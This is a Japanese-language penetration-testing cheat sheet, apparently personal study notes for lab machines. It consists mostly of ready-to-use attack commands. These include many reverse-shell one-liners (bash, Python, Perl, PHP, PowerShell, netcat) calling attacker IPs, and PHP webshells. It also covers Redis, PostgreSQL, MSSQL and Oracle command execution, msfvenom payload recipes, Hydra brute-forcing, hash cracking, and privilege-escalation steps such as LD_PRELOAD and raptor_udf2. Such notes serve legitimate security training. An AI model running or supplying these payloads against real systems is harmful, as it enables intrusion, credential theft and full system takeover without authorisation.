Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.84 seconds
```
2.手動再同期
共有フォルダを一覧表示できる。
今回は先ほどの手順で列挙できたfoxディレクトリを同期する。
資格情報が不要な場合:
```
┌──(kali㉿kali)-[~/pg/boxes/Fail]
└─$ rsync -av --list-only rsync://192.168.227.126/fox
receiving incremental file list
drwxr-xr-x 4,096 2021/01/21 23:21:59 .
lrwxrwxrwx 9 2020/12/04 05:22:42 .bash_history -> /dev/null
-rw-r--r-- 220 2019/04/18 13:12:36 .bash_logout
-rw-r--r-- 3,526 2019/04/18 13:12:36 .bashrc
-rw-r--r-- 807 2019/04/18 13:12:36 .profile
sent 20 bytes received 136 bytes 62.40 bytes/sec
total size is 4,562 speedup is 29.24
```
資格情報が必要な場合:
```
rsync -av --list-only rsync://[email protected]/fox
```
3.列挙したファイルすべてをローカルマシンへコピー
これにより全てのファイルがターゲットマシン上のディレクトリからローカルマシン上のディレクトリに再帰的に転送される。
資格情報が不要な場合:
```
┌──(kali㉿kali)-[~/pg/boxes/Fail]
└─$ rsync -av rsync://192.168.227.126/fox ./fox
receiving incremental file list
created directory ./fox
./
.bash_history -> /dev/null
.bash_logout
.bashrc
.profile
sent 87 bytes received 4,828 bytes 1,404.29 bytes/sec
total size is 4,562 speedup is 0.93
```
資格情報が必要な場合:
```
rsync -av rsync://[email protected]/fox ./fox
```
4.rsyncを使用してpayloadをアップロード
ここではauthorized_keysを含めた.sshをアップロードする。
```
mkdir .ssh
cd .ssh
ssh-keygen -t rsa -f id_rsa
cat id_rsa.pub >> authorized_keys
chmod 600 authorized_keys
cd ../
rsync -av .ssh rsync://192.168.227.126/fox/
```
```
ssh -i id_rsa [email protected]
```
## Microsoft SQL Server(1433)
```
sudo apt install sqlcmd
sqlcmd -U sa -S 192.168.227.70:1435
or
sqsh -U sa -S 192.168.227.70:1435
```
- -U...ユーザ名
- -S...接続先
### xp_cmdshellを利用したコマンド実行
```
# xp_cmdshellの有効化
-- アドバンスオプションの変更を許可
1> EXECUTE sp_configure 'show advanced options', 1;
2> go
-- アドバンスオプションの現在の設定を更新
1> RECONFIGURE;
2> go
-- xp_cmdshellを有効化
1> EXECUTE sp_configure 'xp_cmdshell', 1;
2> go
-- 更新
1> RECONFIGURE;
2> go
```
```
1> xp_cmdshell "whoami"
2> go
```
## Oracle TNS Listener(1521)
ODAT(Oracle Database Attacking Tool):
https://github.com/quentinhardy/odat
```
# install
sudo pip3 install cx_Oracle
sudo apt-get install python3-scapy
sudo pip3 install colorlog termcolor pycrypto passlib python-libnmap
sudo pip3 install argcomplete && sudo activate-global-python-argcomplete
```
```
# All Check
python3 odat.py all -s 10.10.10.82 -p 1521
# SIDの特定
python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[+] SIDs found on the 10.10.10.82:1521 server: XE
# 認証情報の特定(-dは特定したSIDを指定)
python3 odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE
# 認証情報の特定(アカウントファイルの指定)
ここではmetasploitのoracle用ファイルを使用
ただし、ODATでは認証情報のファイルに「/」で区切ったものが必要なためEmacsなどでスペースと/を置き換える。
python3 odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file oracle_default_userpass.txt
[+] Accounts found on 10.10.10.82:1521/sid:XE:
scott/tiger
# 権限の確認
ファイルのアップロード権限(utlfile)や実行権限(externaltable)を列挙
python3 odat.py all -s 10.10.10.82 -d XE -U scott -P tiger --sysdba
# ペイロードのアップロード
python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile "c:\Windows\Temp" "shell.exe" "shell.exe"
[+] The shell.exe file was created on the c:\Windows\Temp directory on the 10.10.10.82 server like the shell.exe file
# アップロードしたペイロードの実行
python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec "C:\Windows\Temp" "shell.exe"
[1] (10.10.10.82:1521): Execute the shell.exe command stored in the C:\Windows\Temp path
```
```
# データベースへ接続
sqlplus SCOTT/[email protected]:1521/XE
# as sysdbaはOracle版sudo
sqlplus SCOTT/[email protected]:1521/XE as sysdba
```
## MySQL(3306)
```
mysql -u root -p
mysql -u root -p -h <host name> -P <port number>
mysql -u root -e 'SHOW DATABASES;'
```
- -D...データベース名の指定
- -e...コマンドラインから直接SQLコマンドを実行
- -h... ホスト名の指定
- -p...パスワードの指定
- -u...ユーザー名の指定
*データベース一覧の表示
```
mysql > show databases;
```
*データベースの追加
```
mysql > create database sample_db;
```
*テーブル一覧の表示
```
mysql > show tables;
```
*全レコードを選択
```
SELECT * FROM <テーブル名>;
```
*テーブル構造の確認(フィールドを整理して表示してくれるため、下記のユーザ情報取得をすると見やすい)
```
describe <テーブル名>;
```
*ユーザ情報取得
```
SELECT Host, User, Password FROM <テーブル名>;
```
*ユーザの追加
```
create user <追加するusername>@<host name> IDENTIFIED BY <password>;
```
*権限付与
```
grant all privileges on test_db.* to <username>@<host name> IDENTIFIED BY <password>;
```
## PostgreSQL(5432)
```
psql -h 192.168.227.47 -U postgres
psql -h 192.168.227.47 -p 5437 -U postgres
```
- -h...ホスト名の指定
- -U...ユーザ名
- -p...ポートの指定
```
# defaults password
postgres/postgres
```
```
# PostgreSQL ディレクトリの一覧
postgres=# select pg_ls_dir('./');
# サーバ側のpostgresファイル読み取り
postgres=# select pg_read_file('PG_VERSION', 0, 200);
```
### RCE
```
postgres=# CREATE TABLE cmd_exec(cmd_output text);
CREATE TABLE
postgres=# COPY cmd_exec FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.227 80 >/tmp/f';
```
## Redis(6379)
```
redis-cli -h 10.10.10.160
```
### RCE
redis-rogue-server:
https://github.com/n0b0dyCN/redis-rogue-server
```
python3 redis-rogue-server.py --rhost 192.168.124.69 --rport 6379 --lhost 192.168.49.124 --lport 6379
```
### Webshell
Webサイトのディクレクトリ配下に書き込み権限がある場合に任意のPHPを仕込める。
ただしPHPがインストールされていない環境などもあったため、上記のredis-rogue-serverを利用したRCEを推奨する。
```
kali@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/www/html/
OK # nginxの場合は/usr/share/nginx/html
10.10.10.160:6379> config set dbfilename redis.php
OK
10.10.10.160:6379> set test "<?php phpinfo(); ?>"
OK
10.10.10.160:6379> save
OK
```
### ssh
"config get dir"コマンドによりredisユーザのhomeを確認できる。
これにより.ssh配下に書き込み権限がある場合に公開鍵を配置してやることでアクセスが可能になる。
```
ssh-keygen -t rsa -f id_rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > spaced_key.txt
cat spaced_key.txt | redis-cli -h 10.10.10.160 -x set ssh_key
```
```
kali@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config get dir
1) "dir"
2) "/var/lib/redis" # /var/lib/redis or /home/redis/.ssh
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename "authorized_keys"
OK
10.10.10.160:6379> save
OK
kali@kali:~# ssh -i id_rsa [email protected]
```
### crontab
/var/spool/cron/crontabsにアクセスできる場合、以下の方法でreverse shellを取得可能。
```
kali@kali:~# echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.1603\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.10.10.160 -x set 1
OK
kali@kali:~# redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/spool/cron/crontabs/
OK
10.10.10.160:6379> config set dbfilename root
OK
10.10.10.160:6379> save
OK
```
## Active Directory()
```
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
```
```
GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-19 04:06:40.351723 2022-08-09 14:22:02.669757
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$e4fb9638ec9b760940ed1a3eb8df637d$0a5228e36e281979c...
```
```
/usr/share/doc/python3-impacket/examples/psexec.py 'active.htb/Administrator:[email protected]'
```
# Exploitation
## ^reverse shell
### Bash
```
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
```
### Python
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
```
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.9",9004))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
### Perl
```
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### PHP
pentestmonkey reverse shell:
https://github.com/pentestmonkey/php-reverse-shell.git
```
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
```
```
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
```
# Web Shell
<?php echo system($_REQUEST ["cmd"]); ?>
<?php echo(system($_GET["cmd"])); ?>
```
```
# 10.10.14.4 443
## nc
http://10.10.10.146/uploads/10_10_14_4.php.jpeg?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.4+443+>/tmp/f
## bash
http://10.10.10.146/uploads/10_10_14_4.php.jpeg?cmd=bash+-i+>%26+/dev/tcp/10.10.14.4/443+0>%261
```
### Ruby
```
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```
### Netcat
```
nc -e /bin/sh 10.0.0.1 1234
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```
### PowerShell
```
C:\Users\offsec> powershell -c "$client = New-Object System.Net.Sockets.TCPClient('10.
11.0.4',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =
$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.T
ext.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII
).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$c
lient.Close()"
```
### Ansible
```
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.10.14.9/443 0>&1'
```
## ^msfvenom
- -p...使用するpayloadの指定
- -f...出力フォーマット
- -a...使用するアーキテクチャ
- -e...エンコーディングの指定(x86/shikata_ga_nai,x64/zutto_dekiru)
- -i...エンコードする回数
- --platform...プラットフォームの選択(windows,Linux)
- -o...ファイルの出力
### Windows
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f exe -o shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o shell.exe
```
### Linux
```
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.16.4 LPORT=443 -f python
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf -o reverse.elf
```
### PHP
```
msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Port Number> -f raw > reverse.php
```
### asp/aspx
```
msfvenom -p windows/shell_reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f aspx > shell.aspx
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f aspx > shell.aspx
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f asp > shell.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f aspx > shell.aspx
```
### JSP
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f raw > shell.jsp
```
### WAR
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip address> LPORT=<Port Number> -f war > shell.war
```
### Python
```
msfvenom -p cmd/unix/reverse_python LHOST=<ip address> LPORT=<Port Number> -f raw > shell.py
```
### Bash
```
msfvenom -p cmd/unix/reverse_bash LHOST=<ip address> LPORT=<Port Number> -f raw > shell.sh
```
### Perl
```
msfvenom -p cmd/unix/reverse_perl LHOST=<ip address> LPORT=<Port Number> -f raw > shell.pl
```
### Handlers(meterpreter)
```
use exploit/multi/handler
set payload <payload>
set LHOST <ip address>
set LPORT <port number>
run
```
### meterpreterコマンド
[]
```
#meterpreterで使用する有用なコマンドをここに書く
```
## HttpServer
・攻撃者マシンでのサーバ立ち上げ。
```
sudo systemctl start apache2
python -m SimpleHTTPServer 9001
python3 -m http.server 9001
php -S 0.0.0.0:9001
ruby -run -e httpd . -p 9001
busybox httpd -f -p 9001
```
## Netcat
・ファイル転送
```
送信側
nc <攻撃者のIPアドレス> 9999 < filename
受信側
nc -l -p 9999 > filename
```
## searchsploit
Exploit-dbを即座に検索できるツール。
```
searchsploit <keyword>
```
ターミナル上でコードを閲覧。
```
searchsploit -m windows/remote/39161.py
```
ローカルにコードやテキストをダウンロード。
これでexploit用スクリプトをダウンロードする。
```
searchsploit -m searchsploit -m windows/remote/39161.py
```
## tcpdump
```
sudo tcpdump -i tun0 icmp
```
## John The Ripper
### zip
```
zip2john a.zip > hash.txt
john hash.txt
or
john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt
```
### ssh
```
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
```
### md5
```
john --wordlist=/usr/share/wordlist/rockyou.txt --format=Raw-MD5 hash.txt
```
### NTLM
```
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT hash.txt
```
### 同じファイルをクラックした時に出るエラー
```
┌──(kali㉿kali)-[~/htb/boxes/Delivery]
└─$ john --wordlist=/usr/share/wordlist/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
No password hashes left to crack (see FAQ)
```
```
┌──(kali㉿kali)-[~/htb/boxes/Delivery]
└─$ john --show hash
?:PleaseSubscribe!21
1 password hash cracked, 0 left
```
## ^hashcat
```
cat hash
cfdfb19f82040000f6b12fdf632b23aceb8772cdbf5bb7....snip
hashcat -m 0 hash /usr/share/wordlist/rockyou.txt
```
- -m 0...MD5
- -m 100...SHA1
- -m 500...md5crypt $1$, MD5(Unix)
- -m 1000...NTLM
- -m 1400...SHA-256
- -m 1700...SHA-512
- -m 1800...sha512crypt $6$, SHA512(Unix)
- -m 3000...LM
- -m 7300...IPMI2
- -m 7400...sha256crypt $5$, SHA256(Unix)
- -m 13100...Kerberos 5, etype 23, TGS-REP
- --user...ユーザ名も入れたハッシュをクラック(Administrator:cfdfb19f82040000f....)
Hash type:
https://hashcat.net/wiki/doku.php?id=example_hashes
### hashcat(ルールベース攻撃)
hashcatを利用して、キーワードを元にルールを用いてワードリストを作成することができる。
ルールは自分で作成することも可能だが、/usr/share/hashcat/rulesを用いることで簡単にワードリストを作成することが可能。
```
hashcat -r /usr/share/hashcat/rules/best64.rule --stdout keyword.txt
```
hashcat:Rule-based Attack
https://hashcat.net/wiki/doku.php?id=rule_based_attack
## ^Hydra
- -l...単一のユーザー名の指定
- -L...ユーザーリストファイルの指定
- -p...単一のパスワードの指定
- -P...パスワードファイルの指定
- -C...username:passwordの辞書を指定
- -s...カスタムポート(sshが22番以外のポートで使用されている時や、https/443を調べる場合に使用)
- -f...ログインとパスワードの組み合わせが少なくとも1つ見つかったら終了
- -V...各試行のログインとパスワードを表示(実行中の試行の様子が確認できる)
- -t...スレッド数の指定
### HTTP Post Form
http-post-formを使用するためには「:」で区切られた3つのパラメータが必要。
それぞれ「ログインページのpath」「BurpSuiteなどで取得したリクエスト」「エラーメッセージ」が必要となる。
また、ユーザー名が不要なログインページでも「-l」のパラメータの設定が必要なため、「-l none」など適当に指定しておく。
```
hydra -l user -P /usr/share/wordlists/rockyou.txt 10.10.10.1 http-post-form "<Login Page>:<Request Body>:<Error Message>"
例)
http:
hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V
https:
hydra -l 'admin' -P /usr/share/wordlists/rockyou.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid Password!" -V -s 443
```
### FTP
```
hydra -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.1 ftp
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt 192.168.227.56 ftp
```
### SSH
```
hydra -f -l <user> -P /usr/share/wordlists/rockyou.txt 10.10.10.1 -t 4 ssh
```
### MySQL
```
hydra -f -l user -P /usr/share/wordlists/rockyou.txt 10.10.10.1 mysql
```
### PostgreSQL
```
hydra -C /usr/share/seclists/Passwords/Default-Credentials/postgres-betterdefaultpasslist.txt 192.168.227.56 postgres
```
### SMB
```
hydra -f -l user -P /usr/share/wordlists/rockyou.txt 10.10.10.1 smb
```
### WordPress
```
hydra -f -l user -P /usr/share/wordlists/rockyou.txt 10.10.10.1 -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
```
### Windows RDP
```
hydra -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.1
```
## patator
さまざまなプロトコルに対応したパスワードクラックツール。
Hydraが成功しない時に、対応するプロトコルモジュールを指定して実行。
下記はsshの例。
```
patator ssh_login host=10.0.0.1 user=root password=FILE0 0=passwords.txt -x ignore:mesg='Authentication failed.'
```
## Wordlist
```
/usr/share/wordlists/rockyou.txt
/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
/usr/share/seclists
/usr/share/seclists/Discoavery/DNS
```
### Wordlistの作成
#### CeWL
指定されたURLを指定された深さまでスパイダーして単語リストを作成するツール。
```
cewl https://test.com/ -w dict.txt
```
- -w...ファイルに出力
- -d...ディレクトリの深さの指定
#### crunch
自動で全ての組み合わせを出力するツール。
下記の例では、最小2文字から最大3文字のワードリストを作成する。
```
crunch 2 3 -o dict.txt
```
#### cupp
対話形式で個人をプロファイリングすることで、ワードリストを作成する。
誕生日、ニックネーム、ペットの名前などを対話形式で答えていく。
```
cupp -i
```
## python2(EOL)
```
# apt
sudo apt install python2
curl https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py
python2 get-pip.py
```
```
ls /home/kali/.local/bin | grep pip
pip
pip2
pip2.7
pipx
pip2 --version
pip 20.3.4 from /home/kali/.local/lib/python2.7/site-packages/pip (python 2.7)
```
```
# pyenv
sudo apt install -y build-essential libssl-dev zlib1g-dev libbz2-dev libreadline-dev libsqlite3-dev wget curl llvm libncurses5-dev libncursesw5-dev xz-utils tk-dev libffi-dev liblzma-dev python3-openssl git
curl https://pyenv.run | bash
echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.zshrc
echo 'export PATH="$PYENV_ROOT/versions/2.7.18/bin:$PATH"' >> ~/.zshrc
echo -e 'if command -v pyenv 1>/dev/null 2>&1; then\n eval "$(pyenv init -)"\nfi' >> ~/.zshrc
exec $SHELL
pyenv install 2.7.18
pyenv global 2.7.18
```
## Docker
```
docker run -v <ホストの絶対パス:コンテナの絶対パス> --name <コンテナ名> -it <イメージ名> /bin/bash
docker run -v /Users/<ユーザ名>/Desktop:/root --name kali -it kalilinux /bin/bash
```
Buildx:
クロスコンパイル用環境構築
```
docker run --privileged --rm tonistiigi/binfmt --install all
```
```
docker pull kalilinux/kali-rolling:arm64
docker pull kalilinux/kali-rolling:latest --platform linux/arm64
```
gdb(ptrace):
```
docker run --name <コンテナ名> -it --cap-add=SYS_PTRACE --security-opt="seccomp=unconfined" <イメージ名> /bin/bash
```
## x86用gccコンパイル
```
sudo apt install libc6-dev-i386
```
## Escape rbash
```
ssh [email protected] -t "bash --noprofile"
ssh [email protected] -t bash
```
```
BASH_CMDS[a]=/bin/sh;a
```
## base64,16進数 → テキスト
```
cat test.txt | base64 -d
echo "aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==" | base64 -d
```
```
cat test.txt | xxd -r -ps
```
## aircrack-ng
```
airmon-ng start wlan0
iwaconfig
airodump-ng wlan0mon
```
```
airodump-ng --channel 対象のチャンネル --bssid APのMACアドレス -w <output filename> wlan0mon
```
```
aircrack-ng <filename>.cap
```
# Privilege Escalation(Linux)
## チェック項目
- tty shell
- linpeas.shの実行(自動列挙)
- ファイル権限の不備(/etc/passwd, /etc/shadow)
- sudoを悪用した権限昇格(sudo -l)
- Cron Jobsの確認(cat /etc/crontab)
- SUIDバイナリを悪用した権限昇格(find / -perm -u=s -type f 2>/dev/null)
- 端末内に残されているpasswordの探索(historyファイル, Webアプリケーションのソースコードやデータベース内の認証情報, .sshディレクトリ内のSSH秘密鍵)
- NFSを介した権限昇格
- 開いているポートの確認(netstat -tulpn)
- 実行中のプロセスの確認(ps -aux,pspyを使用してuid=0<root権限>で定期的に実行されているスクリプトがないか確認)
- Kernel Exploit(uname -a, linux-exploit-suggester-2)
## ^tty shell
```
#bashが制限されている場合はsh
python -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')
/bin/sh -i
perl -e 'exec "/bin/bash";'
perl: exec "/bin/bash";
ruby: exec "/bin/bash"
lua: os.execute('/bin/bash')
```
・Ctrl+c,Ctrl+zなどを利用可能にする
```
stty raw -echo; fg
<Enter><Enter>
```
```
kali@kali:stty -a(結果を下のrows columns に代入)
victim:stty rows 16 columns 136
```
・clearなどを可能にする
```
export TERM=xterm
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>
```
## MySQL raptor_udf2.c
MySQLがrootとして実行されている場合に、mysqlに接続することができればroot権限を取得できる。
https://www.exploit-db.com/exploits/1518
まずは、raptor_udf2.cエクスプロイトコードをコンパイルする。
```
# ターゲットマシンの任意のディレクトリにraptor_udf2.cを配置する。
ただし/tmpに配置すると、後のcreate function do_systemでエラーが出てしまうため、ここでは/dev/shmに配置する。
/dev/shmでもエラーが出てしまう場合は、/var/wwwなどで試す。
cd /dev/shm
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
```
```
mysql -u root -p
```
MySQLのシェルで以下のコマンドを実行して、コンパイルされたエクスプロイトを使用してユーザ定義関数(UDF)「do_system」を作成する。
```
use mysql;
create table foo(line blob);
insert into foo values(load_file('/dev/shm/raptor_udf2.so'));
```
plugin_dirを調べてValueに入っているパス(/usr/lib/mysql/plugin/)をメモする。
```
mysql> show variables like '%plugin%';
+-------------------------------+------------------------+
| Variable_name | Value |
+-------------------------------+------------------------+
| default_authentication_plugin | mysql_native_password |
| plugin_dir | /usr/lib/mysql/plugin/ |
+-------------------------------+------------------------+
```
上記でメモしたパスを指定して、下記のコマンドを実行する。
```
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
```
コマンドの実行に成功したら、do_system関数を利用してreverse shellを張る。
```
select do_system('/bin/nc 192.168.49.227 4444 -e /bin/bash');
```
## Weak File Permissions - Readable /etc/shadow
/etc/shadowファイルにはユーザーパスワードハッシュが記述されている。
通常はrootユーザーのみが読み取ることができるが、設定ミスなどにより一般ユーザーでも読み取り可能なことがある。
まずは、読み取り可能かファイルの権限を確認する。
```
ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
```
読み取り可能である場合、ファイルの中身を閲覧してrootのハッシュをコピーしてテキストファイルに保存する.
```
cat /etc/shadow
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
daemon:*:17298:0:99999:7:::
bin:*:17298:0:99999:7:::
sys:*:17298:0:99999:7:::
cat hash.txt
root:$6$Tb/euwmK$OXA.dwMeOAcopwBl68boTG5zi65wIHsc84OWAIye5VITLLtVlaXvRDJXET..it8r.jbrlpfZeMdwD3B0fGxJI0:17298:0:99999:7:::
```
得られたrootパスワードのハッシュをjohnでパスワードクラックする。
```
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
```
## Weak File Permissions - Writable /etc/shadow
設定ミスなどにより、/etc/shadowファイルが書き込み可能である場合、rootのパスワードハッシュを自身で作成したものに置き換えて権限昇格することが可能である。
```
ls -l /etc/shadow
-rw-r--rw- 1 root shadow 837 Aug 25 2019 /etc/shadow
```
```
mkpasswd -m sha-512 <パスワードにしたい好きな文字列>
$6$xmmQPckNVPWL/VVF$wMS2EIY2jmISe6X2mcuBWo9aWLRg9/TaDhOLK/ZjS1197OSL7LugJIf4JXIhLLDR8xd1kbnKWYITJglhMFwQs1
```
その後、/etc/shadowのパスワードハッシュを上記のハッシュに書き換えて、rootユーザーに切り替える。
## Weak File Permissions - Writable /etc/passwd
/etc/passwdファイルには、ユーザーアカウントに関する情報が含まれている。これは誰でも読み取り可能になっているが、書き込みは通常rootユーザのみとなる。
しかし設定ミスなどにより、/etc/passwdファイルが書き込み可能である場合、rootのパスワードハッシュを自身で作成したものに置き換えて権限昇格することが可能である。
```
ls -l /etc/passwd
-rw-r--rw- 1 bbbbroot root 1025 Feb 8 00:58 /etc/passwd
```
```
openssl passwd <パスワードにしたい好きな文字列>
```
/etc/passwdファイルを編集して、生成されたパスワードハッシュに置き換えてrootユーザーに切り替える。
または、rootユーザーの行をコピーして、ファイルの最後に追加して、新たなrootユーザーとパスワードを設定することも可能である。
## Sudo - Shell Escape Sequences
sudo権限で実行できるプログラムの一覧を表示する。
```
sudo -l
```
GTFOBins(https://gtfobins.github.io)にアクセスして、表示されたプログラムを利用することで権限昇格できるかを試みる。
## Sudo - Environment Variables
sudoはユーザーの環境から特定の環境変数を継承するように構成できる。
まずは、継承されている環境変数を確認する(env_keepオプションを探す)。
```
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
(root) NOPASSWD: /usr/sbin/iftop
```
LD_PRELOADとLD_LIBRARY_PATHは、どちらもユーザーの環境から継承される。
LD_PRELOADは、プログラムの実行時に他のどのオブジェクトよりも先に共有オブジェクトをロードする。
LD_LIBRARY_PATHは、共有ライブラリが最初に検索されるディレクトリのリストを提供します。
下記のコードを使用して共有オブジェクトを作成する。
```
preload.c:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setresuid(0,0,0);
system("/bin/bash -p");
}
```
```
gcc -fPIC -shared -nostartfiles -o /tmp/preload.so /tmp/preload.c
```
LD_PRELOAD環境変数を新しい共有オブジェクトのフルパスに設定しながら、sudo(sudo -lの実行時にリストされる)を介して実行が許可されているプログラムを実行します。
```
sudo LD_PRELOAD=/tmp/preload.so <sudo -lでリストされたプログラム>
```
これにより、rootシェルを取得できる。
これを利用できるパターンとして、GTFOBinsには記載されていないプログラムがsudo -lにリストしている場合である。
例えば、apache2の場合はGTFOBinsには記載されていない。
まずは、apache2プログラムファイルに対してlddコマンドを実行して、プログラムで使用されている共有ライブラリを確認する。
```
ldd /usr/sbin/apache2
linux-vdso.so.1 => (0x00007fff3c8e7000)
libpcre.so.3 => /lib/x86_64-linux-gnu/libpcre.so.3 (0x00007fd2f55c2000)
libaprutil-1.so.0 => /usr/lib/libaprutil-1.so.0 (0x00007fd2f539e000)
libapr-1.so.0 => /usr/lib/libapr-1.so.0 (0x00007fd2f5164000)
libpthread.so.0 => /lib/libpthread.so.0 (0x00007fd2f4f48000)
libc.so.6 => /lib/libc.so.6 (0x00007fd2f4bdc000)
libuuid.so.1 => /lib/libuuid.so.1 (0x00007fd2f49d7000)
librt.so.1 => /lib/librt.so.1 (0x00007fd2f47cf000)
libcrypt.so.1 => /lib/libcrypt.so.1 (0x00007fd2f4598000)
libdl.so.2 => /lib/libdl.so.2 (0x00007fd2f4393000)
